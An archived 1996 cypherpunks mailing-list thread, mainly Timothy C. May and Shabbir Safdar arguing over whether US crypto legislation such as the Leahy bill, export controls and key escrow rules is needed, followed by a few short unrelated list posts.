---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 07:13:14 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <ad7cdcd10e02100463fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:08 AM 3/26/96, Shabbir J. Safdar wrote:
>Timothy C. May writes:

>>I don't see any compelling need for U.S. legislation. And given the
>>pressures to attach all sorts of language to bills, I think it best that no
>>legislation happen.
>
>Unfortunately, this is not an option.  Legislation will happen, with our
>endorsement or without it.  One good example is the Grassley computer
>crime bill earlier in 1995.  Nobody advised him on this, as far as I can
>tell, he just went out and drafted it.  Lo and behold, he drafted a
>provision that basically criminalized all crypto, including rot13.

Of course I am not saying everyone should just be silent. Various
organizations, including Shabbir's own very able VTW, do a good job in
challenging bad laws and helping to make the "political sausage" which is
so very disgusting to watch being made.

My point is that I see no compelling legislation that is needed. If enough
people in Washington really want increased length in _exported products_
(remember the "exported" part), the Congress and the President should find
it easy enough to get said products on to the Approved List. (I note that
the Leahy Bill really doesn't change this system anyway...some products go
on the list, some don't...the law only seems to say that when the horse has
already left the barn, i.e., when "comparable" products are already in
fairly wide use outside the U.S., then the products should be put on the
approved list. Big deal.

And my meta-point, repeated in several recent posts, is that compromising
on very basic liberties for the sake of a "deal" to let Lotus or Microsoft
or RSADSI have one uniform, "world" product is a very bad deal.

(Key length alone is not an answer, anyway. Domestically we can have
arbitrary key lengths, with no limits on strength. So, will a "world
version" be limited to 64 bits (at best)? Will I, as an American, be forced
to limit myself to this "world" length? This is a compromise of my
liberties, just for the sake of simplifying the inventory control problems
of Lotus and Microsoft! And it still doesn't address the many points we've
discussed over the years about superencryption, rogue programs, and access
by foreign LEAs.)

Granted, the Leahy Bill does not explicitly mandate key escrow, whether
TIS' CKE/SKE or Lotus' "40+24" crypto-with-two-heads scheme. But it
includes language that suggests a role for government in key escrow and
even says escrow holders may not notify the subject of a subpoena that his
key has been snarfed by the Feds. (Superficially, this resembles wiretaps,
except that one's escrow agent may be one's lawyer, or mother, or business
partner....it makes for messy situations.)

I'll have to move on to Shabbir's other comments.

>We have to wake up and learn from the fight against the net censorship
>legislation.  This is realpolitik.  Congress will legislate crypto,
>whether we want them to or not.  This is not news anyone wants to hear,
>but we have to face up to it.

Be my guest. You're in Washington, you're connected, you're in a position
to lobby. I only speak for myself, and my views. I am 3000 miles away from
D.C., and have no intention of visiting that mosquito pit (I grew up
outside of D.C.).

I put my argument efforts into this mailing list (and Cyberia, until
recently). If people want to read my arguements, they can subscribe, or get
the occasional article forwarded. Frankly, I don't think my brand of
political philosophy fits, and I'm not going to change my political
philosophy just to help Lotus or Microsoft get approval to export a 64-bit
version of "Lotus Notes" or "Bob."

>Congress has discovered the net, and partly though the widespread fame
>of this list, they have also discovered crypto.  Simply saying, "we don't
>want any laws that address crypto" may be the ideal solution, but that won't
>stop them from passing laws that govern the domestic use of crypto.

Well, this is when things will get exciting. This is the Real Battle (tm)
we've all been anticipating: laws on domestic use of encryption. Maybe I'll
share a cell with that guy who was caught writing in an unapproved
diary...Winston Smith, I think his name was (CNN carried a report on his
conviction..."Escrow is Freedom").

Until then, the more Congress learns about the Potential Dangers of Crypto,
the worse for us. (I had a noted lobbyist approach me about speaking before
a committee...when it became clear to him that I wasn't interested in
giving a "See Dick read, see Jane encrypt" PR blurb for crypto, he realized
I was not the right person. Frankly, the ACLU and that sort can do a
perfectly fine job on the "basics" of crypto, the 10-minute version (that
still leaves the Congressfolks in a haze).

Aside: My hunch is that crypto legislation will languish. Until, maybe next
year, maybe the year after, some major event occurs. Could be a new
bombing. Could be a terrorist cell raided. But they will be found to be
using PGP or somesuch (80% likely to be PGP), with anonymous remailers used
for breaking traffic analysis. The media will go into a feeding frenzy.
John Holliman of CNN will be taken off his usual space shuttle duties and
assigned to figure out what this crypto stuff is all about. Cathy Cleaver
and Donna Rice will tie it into pornography. Ralph Reed will mutter about
the Number of the Beast. And drastic legislation will be proposed and
passed. Don't forget that Clinton's Anti-Terrorism Bill, which predated OKC
by a few months, came very close to passing (and may still...as of a few
days ago it was still pending, though parts of it had been gutted).

And what effect will Leahy's Bromide ("bromide: a soothing concoction")
Bill have if such a crypto-facillitated incident occurs? None. It will be
swept away as a sand castle is swept away by the incoming tide.

So why bother? Why not instead "race to the point of no return"? (For a
fuller description of this "point of return," the point at which
sufficiently strong crypto has been sufficiently widely deployed so that it
cannot be recalled, cf. my Cyphernomicon. The crypto anarchist point of
view is that the genie is out of the bottle, Pandora's Box has been opened,
for the good, the bad, and the ugly, and that legislation will matter
little in the long run.

To be sure, for people who live near Washington, whose interest is
primarily in the political (the conventional political), then I can see why
their interest is in helping Congress to craft better laws. But for the
rest of us, we have our own work to do.


>>* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
>>companies, but is not _per se_ an issue I worry about. So long as I have
>>strong crypto, I don't really care too much about export. It would be nice
>>to get the ITARs modified, but not at the risk of adding language (such as
>>Leahy did) making use of encryption a possible crime (we've debated this,
>>so I won't elaborate here). Besides, I think the best way to overturn the
>>ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>>felt that the ITARs would not withstand court scrutiny.
>
>Unfortunately, many U.S. software companies don't agree with you.

This is fine. I don't expect them to agree with me. When one of them begins
paying me a salary or sending me shares of their company's stock, then
perhaps I will argue for their positions. (Not that I'm a sellout, just
noting the obvious. They're looking to sell more products, at lower cost,
which if not surprising. But if the price for "getting" approval for 64-bit
export is some flavor of key escrow or limitations on domestic use, then
why should we help them push for this?)

>While I agree with you (I've got PGP, what's the problem?), several of
>these companies are working through their trade organizations to introduce
>and push crypto legislation to allow them to raise the key length in their
>products.
>
>Put ourselves in their shoes for a minute.  They're sitting there, with
>their 40 bit products, knowing that it blows chunks.  They want to
>produce stronger crypto, but know they won't be able to export it.
>They talk to the company's attorneys, who speak to speak to the
>lobbyists, and poof, a crypto bill.

I outline the answer to this during the Netscape--Jim Clarke situation
several months ago. The simple solution: have two versions.

Version 1 has unlimited-strength crypto, no mandatory key escrow. It ships
to domestic customers only, and can only be downloaded domestically (a la
the PGP distributions).

Version 2 is crippled. 40 bits, 45 bits, whatever. Maybe it has a set of
hooks for attaching "local regulations" hooks (e.g., all versions of
Netscape entering France must have no crypto, all versions entering The
Islamic People's Republic must automatically cc: the secret police on all
e-mail, etc.).

These versions may or may not intercommunicate easily.

The "added inventory" problems that a vendor faces are real, but he faces
problems already with multiple languages (English, French, Spanish, German,
Japanese, etc.), with multiple platforms, etc.

Also--and this is seldom mentioned!--the inclusion of U.S.-mandated crypto
restrictions may end up "opening the flood gates" for various other
countries to demand their own versions (as noted above in the examples). If
the U.S. stands firm and takes no stand, it will be very hard for Iraq or
Singapore to demand special versions. But if the U.S. insists that packages
have NSA-friendly provisions, so, too, might the other countries demand the
same. (A vendor may refuse to comply, but his hand has already been
weakened by his acquiescence to the U.S. demands for a special version.)

Thus, it is possible that the crypto provisions will actually _worsen_ the
inventory problem. (As noted by so many others, what are the chances that
France or Singapore or Iran will go along with the inclusion of NSA
trapdoors in products their citizen-units and corporations will be using?
Does anyone imagine that France will tolerate a version of Netscape being
used by its corporations that the NSA can trivially break? Get with it.)

But the issue raised by Shabbir is still this: corporations really want to
ship stronger products and they'd like to be able to only have to develop
and stock one version. So should we accept a weaker domestic encryption
standard to let RSA and Lotus achieve this goal?

(One can imagine many parallels with other products. Perhaps some countries
only allow citizen-units to have access to .22 caliber firearms. Gun
companies would like a single world standard. Does this mean gun
enthusiasts in the U.S. should then lobby for the .22 as the allowable
standard? Interestingly, at least some gun companies (names excised to
avoid lawsuits) have exactly this position, that gun control laws are fine
with them if it means they can ship more products and face less regulation.
I am not equating Jim Bidzos, Ray Ozzie, or Jim Clarke to these folks, but
am pointing out that the "interests of industry" are not always coterminous
with the interests of citizens, or users, or free men.)

There are in fact many situations where a corporation will gladly welcome
government regulation. They can cement their own positions and keep out
upstart competitors. There's a lot of evidence that some large electronics
companies actually _like_ regulatory burdens, as it tends to make it very
tough for a small company these days to start a production fab. I can thus
see that some crypto and software companies would potentially make a deal
with the devil if it increased sales and strengthened their "franchise."

I've written more than enough, so I'll have to stop here.

I believe what I have read from others, that the Leahy Bill is going
nowhere. As to other legislation, I've never said people should do nothing.
What I've said is that I place more faith in technology: the development of
anonymous remailers, for example, does more to disperse unstoppable
communication than any bill I've seen come out of Congress.

And, frankly and bluntly, while I am not as extreme (in some ways) as, say,
Jim Bell, in other ways I and many others of us are quite extreme. (I
usually vote Libertarian, but even they are recognizing that they have no
effect on Congress because the goals of Congress and of themselves are so
far apart.)

Were I closer to Washington, maybe I'd be more interested. But I'm not. I'm
even too far from San Francisco to drive the 100 miles over mountain roads
to stand in the rain with a placard being a spear carrier for some cause.

Life is tough.


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 28 Mar 1996 09:38:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603260708.CAA21623@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I think this is a very important area to consider, and I thank Tim for
putting his thoughts into this very organized form.  My replies:

Timothy C. May writes:
>>If the Leahy bill is unacceptable, what legistlation is necessary? I
>>can't see how the use of cryptography in the commission of a crime needs
>>to be a separate offence, but I could see how it could be treated as a
>>special circumstance - that doesn't really needed a new law though.
>
>I don't see any compelling need for U.S. legislation. And given the
>pressures to attach all sorts of language to bills, I think it best that no
>legislation happen.

Unfortunately, this is not an option.  Legislation will happen, with our
endorsement or without it.  One good example is the Grassley computer
crime bill earlier in 1995.  Nobody advised him on this, as far as I can
tell, he just went out and drafted it.  Lo and behold, he drafted a
provision that basically criminalized all crypto, including rot13.

We have to wake up and learn from the fight against the net censorship
legislation.  This is realpolitik.  Congress will legislate crypto,
whether we want them to or not.  This is not news anyone wants to hear,
but we have to face up to it.

>* DOMESTIC USE OF ENCRYPTION: Currently, no restrictions whatsoever. No
>laws saying messages can't be encrypted, no laws saying keys must be
>escrowed, no laws about permissable strength of ciphers, no special laws
>covering disclosure of keys. Just silence, blessed silence. The
>Constitution says there shall be no laws about permissable speech (what
>language one speaks in, or writes in), and other provisions about compelled
>testimony seem adequate.

Congress has discovered the net, and partly though the widespread fame
of this list, they have also discovered crypto.  Simply saying, "we don't
want any laws that address crypto" may be the ideal solution, but that won't
stop them from passing laws that govern the domestic use of crypto.

>* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
>companies, but is not _per se_ an issue I worry about. So long as I have
>strong crypto, I don't really care too much about export. It would be nice
>to get the ITARs modified, but not at the risk of adding language (such as
>Leahy did) making use of encryption a possible crime (we've debated this,
>so I won't elaborate here). Besides, I think the best way to overturn the
>ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>felt that the ITARs would not withstand court scrutiny.

Unfortunately, many U.S. software companies don't agree with you.
While I agree with you (I've got PGP, what's the problem?), several of
these companies are working through their trade organizations to introduce
and push crypto legislation to allow them to raise the key length in their
products.

Put ourselves in their shoes for a minute.  They're sitting there, with
their 40 bit products, knowing that it blows chunks.  They want to
produce stronger crypto, but know they won't be able to export it.
They talk to the company's attorneys, who speak to speak to the
lobbyists, and poof, a crypto bill.

>* KEY ESCROW: A matter of contract law, nothing more. If I want to give a
>copy of my key to my lawyer, fine. If I want to give a copy to Vince's
>Offshore Key Repository, no current U.S. laws stops me from doing so, and I
>can even get it to him securely without violating any ITARs by using the
>cipher that _he_ uses and then importing it here!
>
>IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
>a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
>5th Amendment's protections against self-incrimination, and so must honor a
>subpoena. Sounds accurate to me. However, what if Joe is _also_ one's
>lawyer? Does attorney-client privilege apply here? Perhaps. A better
>solution is also fully legal at this time: use only offshore key storage. A
>U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
>Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
>and I could have a stipulation that such "duress requests" will not be
>honored, no matter how loudly I squawk.)

This is actually very important.  The Leahy bill forces Joe's Key
Warehouse to only divulge your key when they've been presented with a
warrant that's on par with whatever they used to get your original
communication.  That means that Louis Freeh can't issue an
administrative subpoena to get your key, after he's got a judge to
allow the FBI to search your house.  They have to get a judge involved
for both parts.

It's better than where we are today, where Joe's Key Warehouse is vulnerable
to every law enforcement joker that can write an administrative subpoena.  We
haven't yet had an incident that demonstrates this, but we will.

Of course, if you're the sort of person who thinks that the FBI and the
Department of Justice are involved in a big criminal conspiracy to begin
with, we shouldn't even be talking about due process, as you don't believe
it exists...

>In conclusion, things are fine as they are. I see no compelling need to
>write a special law confirming the rights we already are enjoying. If the
>Congress wants to relax the ITARs (fat chance), they can direct that the
>language of specific sections be redrafted. (I'm not even sure when and how
>the original language was crafted, though it is part, I believe, of the
>ancient Munitions Act and/or Trading with the Enemy Act. The enabling
>legislation for the ITARs, and especially for the specific items actually
>ON the "Munitions List" could be trivially changed. Were this Leahy's
>intent, an easy thing to write a bill for. I doubt this was his intent,
>however.

I think this indeed is what Leahy was aiming for.  A quick glance at the
bill will prove this out.  The approach that "things are fine as they are"
is like saying "I'm on a freight train, heading for a cliff, but they're
still serving me caviar so it's OK".

Sure, it feels ok, but the train's still moving, no matter how far you are
into your denial. 

I can't say this enough: the net has moved into realpolitik.  Congress
has found us, and their first step is to regulate us.  Then, they'll outlaw
us.  Let's hope we convert enough legislators to netizens before they outlaw
us.

-Shabbir J. Safdar
co-founder, Voters Telecommunications Watch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 28 Mar 1996 07:13:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603260852.DAA24892@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I read Tim's comments with enthusiasm, as I think we agree on many 
things.  I, as well, wish for a world where there is crypto so
heavily proliferated that all the regulations in the world cannot
either hinder or help get it into the hands of the public.

In the meantime, Tim advocates putting good code out there for people
to use, racing to the point of no return.  I don't disagree, but that's
not where my talents lie.  Mine lies in keeping Congress from doing damage
today, a strategy which Tim may call very short term (getting good code
out and well-deployed is long term) but hey, it's what we do.

Let's hope we both arrive at that end in time to retrospect about
strategy.  I must agree though, watching legislation is a lot like
watching sausage being made...

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

PS If you're going to be at CFP, stop me and say hi.

Timothy C. May writes:
>At 7:08 AM 3/26/96, Shabbir J. Safdar wrote:
>>Timothy C. May writes:
>
>>>I don't see any compelling need for U.S. legislation. And given the
>>>pressures to attach all sorts of language to bills, I think it best that no
>>>legislation happen.
>>
>>Unfortunately, this is not an option.  Legislation will happen, with our
>>endorsement or without it.  One good example is the Grassley computer
>>crime bill earlier in 1995.  Nobody advised him on this, as far as I can
>>tell, he just went out and drafted it.  Lo and behold, he drafted a
>>provision that basically criminalized all crypto, including rot13.
>
>Of course I am not saying everyone should just be silent. Various
>organizations, including Shabbir's own very able VTW, do a good job in
>challenging bad laws and helping to make the "political sausage" which is
>so very disgusting to watch being made.
>
>My point is that I see no compelling legislation that is needed. If enough
>people in Washington really want increased length in _exported products_
>(remember the "exported" part), the Congress and the President should find
>it easy enough to get said products on to the Approved List. (I note that
>the Leahy Bill really doesn't change this system anyway...some products go
>on the list, some don't...the law only seems to say that when the horse has
>already left the barn, i.e., when "comparable" products are already in
>fairly wide use outside the U.S., then the products should be put on the
>approved list. Big deal.
>
>And my meta-point, repeated in several recent posts, is that compromising
>on very basic liberties for the sake of a "deal" to let Lotus or Microsoft
>or RSADSI have one uniform, "world" product is a very bad deal.
>
>(Key length alone is not an answer, anyway. Domestically we can have
>arbitrary key lengths, with no limits on strength. So, will a "world
>version" be limited to 64 bits (at best)? Will I, as an American, be forced
>to limit myself to this "world" length? This is a compromise of my
>liberties, just for the sake of simplifying the inventory control problems
>of Lotus and Microsoft! And it still doesn't address the many points we've
>discussed over the years about superencryption, rogue programs, and access
>by foreign LEAs.)
>
>Granted, the Leahy Bill does not explicitly mandate key escrow, whether
>TIS' CKE/SKE or Lotus' "40+24" crypto-with-two-heads scheme. But it
>includes language that suggests a role for government in key escrow and
>even says escrow holders may not notify the subject of a subpoena that his
>key has been snarfed by the Feds. (Superficially, this resembles wiretaps,
>except that one's escrow agent may be one's lawyer, or mother, or business
>partner....it makes for messy situations.)
>
>I'll have to move on to Shabbir's other comments.
>
>>We have to wake up and learn from the fight against the net censorship
>>legislation.  This is realpolitik.  Congress will legislate crypto,
>>whether we want them to or not.  This is not news anyone wants to hear,
>>but we have to face up to it.
>
>Be my guest. You're in Washington, you're connected, you're in a position
>to lobby. I only speak for myself, and my views. I am 3000 miles away from
>D.C., and have no intention of visiting that mosquito pit (I grew up
>outside of D.C.).
>
>I put my argument efforts into this mailing list (and Cyberia, until
>recently). If people want to read my arguements, they can subscribe, or get
>the occasional article forwarded. Frankly, I don't think my brand of
>political philosophy fits, and I'm not going to change my political
>philosophy just to help Lotus or Microsoft get approval to export a 64-bit
>version of "Lotus Notes" or "Bob."
>
>>Congress has discovered the net, and partly though the widespread fame
>>of this list, they have also discovered crypto.  Simply saying, "we don't
>>want any laws that address crypto" may be the ideal solution, but that won't
>>stop them from passing laws that govern the domestic use of crypto.
>
>Well, this is when things will get exciting. This is the Real Battle (tm)
>we've all been anticipating: laws on domestic use of encryption. Maybe I'll
>share a cell with that guy who was caught writing in an unapproved
>diary...Winston Smith, I think his name was (CNN carried a report on his
>conviction..."Escrow is Freedom").
>
>Until then, the more Congress learns about the Potential Dangers of Crypto,
>the worse for us. (I had a noted lobbyist approach me about speaking before
>a committee...when it became clear to him that I wasn't interested in
>giving a "See Dick read, see Jane encrypt" PR blurb for crypto, he realized
>I was not the right person. Frankly, the ACLU and that sort can do a
>perfectly fine job on the "basics" of crypto, the 10-minute version (that
>still leaves the Congressfolks in a haze).
>
>Aside: My hunch is that crypto legislation will languish. Until, maybe next
>year, maybe the year after, some major event occurs. Could be a new
>bombing. Could be a terrorist cell raided. But they will be found to be
>using PGP or somesuch (80% likely to be PGP), with anonymous remailers used
>for breaking traffic analysis. The media will go into a feeding frenzy.
>John Holliman of CNN will be taken off his usual space shuttle duties and
>assigned to figure out what this crypto stuff is all about. Cathy Cleaver
>and Donna Rice will tie it into pornography. Ralph Reed will mutter about
>the Number of the Beast. And drastic legislation will be proposed and
>passed. Don't forget that Clinton's Anti-Terrorism Bill, which predated OKC
>by a few months, came very close to passing (and may still...as of a few
>days ago it was still pending, though parts of it had been gutted).
>
>And what effect will Leahy's Bromide ("bromide: a soothing concoction")
>Bill have if such a crypto-facillitated incident occurs? None. It will be
>swept away as a sand castle is swept away by the incoming tide.
>
>So why bother? Why not instead "race to the point of no return"? (For a
>fuller description of this "point of return," the point at which
>sufficiently strong crypto has been sufficiently widely deployed so that it
>cannot be recalled, cf. my Cyphernomicon. The crypto anarchist point of
>view is that the genie is out of the bottle, Pandora's Box has been opened,
>for the good, the bad, and the ugly, and that legislation will matter
>little in the long run.
>
>To be sure, for people who live near Washington, whose interest is
>primarily in the political (the conventional political), then I can see why
>their interest is in helping Congress to craft better laws. But for the
>rest of us, we have our own work to do.
>
>
>>>* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
>>>companies, but is not _per se_ an issue I worry about. So long as I have
>>>strong crypto, I don't really care too much about export. It would be nice
>>>to get the ITARs modified, but not at the risk of adding language (such as
>>>Leahy did) making use of encryption a possible crime (we've debated this,
>>>so I won't elaborate here). Besides, I think the best way to overturn the
>>>ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>>>felt that the ITARs would not withstand court scrutiny.
>>
>>Unfortunately, many U.S. software companies don't agree with you.
>
>This is fine. I don't expect them to agree with me. When one of them begins
>paying me a salary or sending me shares of their company's stock, then
>perhaps I will argue for their positions. (Not that I'm a sellout, just
>noting the obvious. They're looking to sell more products, at lower cost,
>which if not surprising. But if the price for "getting" approval for 64-bit
>export is some flavor of key escrow or limitations on domestic use, then
>why should we help them push for this?)
>
>>While I agree with you (I've got PGP, what's the problem?), several of
>>these companies are working through their trade organizations to introduce
>>and push crypto legislation to allow them to raise the key length in their
>>products.
>>
>>Put ourselves in their shoes for a minute.  They're sitting there, with
>>their 40 bit products, knowing that it blows chunks.  They want to
>>produce stronger crypto, but know they won't be able to export it.
>>They talk to the company's attorneys, who speak to speak to the
>>lobbyists, and poof, a crypto bill.
>
>I outline the answer to this during the Netscape--Jim Clarke situation
>several months ago. The simple solution: have two versions.
>
>Version 1 has unlimited-strength crypto, no mandatory key escrow. It ships
>to domestic customers only, and can only be downloaded domestically (a la
>the PGP distributions).
>
>Version 2 is crippled. 40 bits, 45 bits, whatever. Maybe it has a set of
>hooks for attaching "local regulations" hooks (e.g., all versions of
>Netscape entering France must have no crypto, all versions entering The
>Islamic People's Republic must automatically cc: the secret police on all
>e-mail, etc.).
>
>These versions may or may not intercommunicate easily.
>
>The "added inventory" problems that a vendor faces are real, but he faces
>problems already with multiple languages (English, French, Spanish, German,
>Japanese, etc.), with multiple platforms, etc.
>
>Also--and this is seldom mentioned!--the inclusion of U.S.-mandated crypto
>restrictions may end up "opening the flood gates" for various other
>countries to demand their own versions (as noted above in the examples). If
>the U.S. stands firm and takes no stand, it will be very hard for Iraq or
>Singapore to demand special versions. But if the U.S. insists that packages
>have NSA-friendly provisions, so, too, might the other countries demand the
same. (A vendor may refuse to comply, but his hand has already been
>weakened by his acquiescence to the U.S. demands for a special version.)
>
>Thus, it is possible that the crypto provisions will actually _worsen_ the
>inventory problem. (As noted by so many others, what are the chances that
>France or Singapore or Iran will go along with the inclusion of NSA
>trapdoors in products their citizen-units and corporations will be using?
>Does anyone imagine that France will tolerate a version of Netscape being
>used by its corporations that the NSA can trivially break? Get with it.)
>
>But the issue raised by Shabbir is still this: corporations really want to
>ship stronger products and they'd like to be able to only have to develop
>and stock one version. So should we accept a weaker domestic encryption
>standard to let RSA and Lotus achieve this goal?
>
>(One can imagine many parallels with other products. Perhaps some countries
>only allow citizen-units to have access to .22 caliber firearms. Gun
>companies would like a single world standard. Does this mean gun
>enthusiasts in the U.S. should then lobby for the .22 as the allowable
>standard? Interestingly, at least some gun companies (names excised to
>avoid lawsuits) have exactly this position, that gun control laws are fine
>with them if it means they can ship more products and face less regulation.
>I am not equating Jim Bidzos, Ray Ozzie, or Jim Clarke to these folks, but
>am pointing out that the "interests of industry" are not always coterminous
>with the interests of citizens, or users, or free men.)
>
>There are in fact many situations where a corporation will gladly welcome
>government regulation. They can cement their own positions and keep out
>upstart competitors. There's a lot of evidence that some large electronics
>companies actually _like_ regulatory burdens, as it tends to make it very
>tough for a small company these days to start a production fab. I can thus
>see that some crypto and software companies would potentially make a deal
>with the devil if it increased sales and strengthened their "franchise."
>
>I've written more than enough, so I'll have to stop here.
>
>I believe what I have read from others, that the Leahy Bill is going
>nowhere. As to other legislation, I've never said people should do nothing.
>What I've said is that I place more faith in technology: the development of
>anonymous remailers, for example, does more to disperse unstoppable
>communication than any bill I've seen come out of Congress.
>
>And, frankly and bluntly, while I am not as extreme (in some ways) as, say,
>Jim Bell, in other ways I and many others of us are quite extreme. (I
>usually vote Libertarian, but even they are recognizing that they have no
>effect on Congress because the goals of Congress and of themselves are so
>far apart.)
>
>Were I closer to Washington, maybe I'd be more interested. But I'm not. I'm
>even too far from San Francisco to drive the 100 miles over mountain roads
>to stand in the rain with a placard being a spear carrier for some cause.
>
>Life is tough.
>
>
>--Tim May
>
>
>Boycott "Big Brother Inside" software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^756839 - 1  | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 28 Mar 1996 14:44:45 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , , shame)
In-Reply-To: <Pine.SUN.3.91.960325135047.25482A-100000@kelly.teleport.com>
Message-ID: <Pine.SUN.3.91.960326054423.28374A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Rich Burroughs wrote:

> On Mon, 25 Mar 1996, Simon Spero wrote:
> 
> > 
> > If the Leahy bill is unacceptable, what legistlation is necessary? I 
> > can't see how the use of cryptography in the commission of a crime needs 
> > to be a separate offence, but I could see how it could be treated as a 
> > special circumstance - that doesn't really needed a new law though.
> [snip]
> 
> Good question.
> 
> Along this line -- what are the penalties for withholding other types of 
> possible evidence from investigating officers?  It seems that often the 
> penalites for "computer crimes" are more harsh than for the "normal" 
> version of the crime.  Is that the case with the penalties in Leahy's bill? 

I have personally been involved in cases involving fines of $75,000 per 
day for noncompliance with a grand jury subpoena duces tecum calling for 
the surrender of banking documents.

> 
> ______________________________________________________________________
> Rich Burroughs  --  richieb@teleport.com  --  psu07973@odin.cc.pdx.edu
> http://www.teleport.com/~richieb --- Opinions are mine, not Teleport's
> PGP key fingerprint:  1F A1 40 72 92 02 DE 7A  80 D0 5A 57 D3 1C 87 86
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Fri, 29 Mar 1996 13:22:24 +0800
To: "frissell@panix.com>
Subject: RE: Weapons & Hope
Message-ID: <01BB1AE5.90E0B8A0@king1-19.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Duncan Frissell[SMTP:frissell@panix.com]
Sent: 	Tuesday, March 26, 1996 8:42 AM
To: 	cypherpunks@toad.com
Subject: 	Weapons & Hope
While it might be barely possible
in the mass production age to control weapons by blocking the flow of these
specific products (a Streetsweeper, say) into the marketplace, it will
clearly not be possible  in the age of custom production.  General machines
will be available to produce specialized products (often under the direct
control of the customer, himself).  Some of this custom production will be
weapons.
	
I took machine tool operations @ my local community college. suffice it 
to say, good, high-quality firearms are **EASY** to fabricate (Believe me!)
	So my point is this: Just as the Gov't CANNOT prevent me from making a gun in my basement, whats to stop some high-school juinor from writing
a strong crypto program?
	I can just see Chuckie Schumer introducing (W/ Sen. Fine-Swine as 
co-sponor) a bill to ban "Cyberwar Software" i.e. mandatory registration of compilers, mandatory GAK, etc... What an asshole.
Take care,
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Thu, 28 Mar 1996 09:34:49 +0800
To: webmaster@pepsi.com
Subject: Re: Pepsi World - Gotta Have It!
Message-ID: <199603261714.JAA21353@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


hoax, I presume?

At 06:46 PM 3/20/96 -0600, you wrote:
>Hey Squatter!
>
>Don't forget to cruise back by Pepsi World!
>
>
>We're gonna keep showing ya the coolest, hippest stuff out there, including:
>
>- Shaq/Pepsi World's Slammin' Techno Dream Contest
>- The Bev-o-Matic Contest
>- An exciting, original Shockwave game
>- Chat Rooms
>- And basically, more entertainment than you can shake a stick at!
>
>
>
>Don't forget your squatter id 'cypherpunk' and password 
>'cypherpunk', you'll need them to maintain your Squatter's 
>rights in Pepsi World.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rich Burroughs" <richieb@teleport.com>
Date: Thu, 28 Mar 1996 15:55:45 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603261745.JAA16303@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


 tcmay@got.net (Timothy C. May) wrote:

[snip]
> Jim's argument (?) could be turned in all sorts of ways: "Your Honor, there
> is nothing I can find in the Constitution that says I can't drive on the
> left side of the road at 125 miles per hour." Indeed, there is nothing
> laying out detailed traffic laws. And so on.
[snip]

Or a right to privacy, for that matter.  It's not stated anywhere explicictly 
in the Bill of Rights -- the courts have patched together a legal framework for 
it.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
Protest the CDA - Join the EFF's Blue Ribbon Anti-Censorship Campaign!
